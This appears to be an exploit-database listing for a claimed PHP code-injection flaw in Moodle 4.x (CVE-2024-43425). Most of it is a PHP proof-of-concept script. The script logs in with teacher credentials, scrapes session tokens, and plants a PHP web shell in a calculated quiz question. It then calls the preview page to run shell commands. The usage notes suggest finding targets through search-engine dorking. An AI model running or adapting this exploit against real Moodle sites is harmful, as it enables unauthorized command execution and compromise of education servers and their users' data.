Share
## https://sploitus.com/exploit?id=PACKETSTORM:214689
=============================================================================================================================================
    | # Title     : Moodle 4.x PHP Code Injection Vulnerability                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://moodle.com/moodle-4/                                                                                                |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: (PHP Code Injection Vulnerability) in Moodle (CVE-2024-43425). The module executes commands using command injection through the Moodle quiz question feature.
    	
    [+] save code as poc.php .
    
    [+] Set Target : line 8 + 9 + 10
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    //CVE-2024-43425
    //https://packetstorm.news/files/id/183003/
    
    
    // إعدادات الاستغلال
    $target = "http://example.com"; // رابط Moodle المستهدف
    $username = "teacher";
    $password = "password";
    
    // تخزين الكوكيز
    $cookie_file = tempnam(sys_get_temp_dir(), "cookies");
    
    // دالة لتنفيذ طلب HTTP عبر cURL
    function send_request($url, $post_fields = null, $use_cookie = true) {
        global $cookie_file;
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        if ($use_cookie) {
            curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
            curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
        }
        if ($post_fields) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
        }
        $response = curl_exec($ch);
        if (curl_errno($ch)) {
            die("خطأ في cURL: " . curl_error($ch) . "\n");
        }
        curl_close($ch);
        return $response;
    }
    
    // 1. الحصول على `logintoken`
    $login_page = send_request("$target/login/index.php", null, false);
    preg_match('/name="logintoken" value="(.*?)"/', $login_page, $matches);
    $logintoken = $matches[1] ?? die("❌ فشل في الحصول على logintoken\n");
    
    // 2. تسجيل الدخول
    $login_data = [
        "username" => $username,
        "password" => $password,
        "logintoken" => $logintoken
    ];
    $response = send_request("$target/login/index.php", $login_data);
    
    // التأكد من نجاح تسجيل الدخول
    if (strpos($response, "dashboard") === false) {
        die("❌ فشل تسجيل الدخول!\n");
    }
    
    // 3. الحصول على `sesskey`
    $dashboard = send_request("$target/my/");
    preg_match('/"sesskey":"(.*?)"/', $dashboard, $matches);
    $sesskey = $matches[1] ?? die("❌ فشل في الحصول على sesskey\n");
    
    // 4. استخراج `courseContextId`
    preg_match('/data-contextid="(\d+)"/', $dashboard, $matches);
    $courseContextId = $matches[1] ?? die("❌ فشل في الحصول على courseContextId\n");
    
    // 5. إضافة السؤال مع الحمولة (Payload)
    $payload = "<p><?php system(escapeshellarg(\$_GET['a'] ?? 'id')); ?></p>";
    $question_data = [
        "category" => "$courseContextId,1",
        "sesskey" => $sesskey,
        "qtype" => "calculated",
        "name" => "exploit",
        "questiontext[text]" => $payload,
        "questiontext[format]" => "1",
        "submitbutton" => "Save changes"
    ];
    send_request("$target/question/question.php", $question_data);
    
    // 6. تنفيذ الأوامر عبر الطلب GET
    $cmd = $_GET['a'] ?? 'id';
    $response = send_request("$target/question/preview.php?a=" . urlencode($cmd));
    
    // عرض النتيجة
    echo "✅ نتيجة التنفيذ:\n";
    echo htmlspecialchars($response);
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================